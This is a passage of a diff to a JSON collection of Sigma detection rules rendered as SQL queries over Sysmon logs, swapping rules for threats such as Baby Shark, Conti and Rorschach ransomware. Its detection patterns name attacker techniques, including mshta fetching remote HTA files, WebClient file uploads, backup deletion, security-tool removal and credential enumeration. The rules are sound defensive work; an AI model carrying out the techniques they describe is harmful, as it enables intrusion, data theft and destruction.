'%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", - "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE 
'\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName 
= 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE 
'%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.execution", + 
"attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR 
(CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + }, + { + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE 
'% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE 
'%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects 
a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. 
A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", + "status": "experimental", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", 
"tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "title": "Suspicious Microsoft Office Child Process", + "id": 
"438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' 
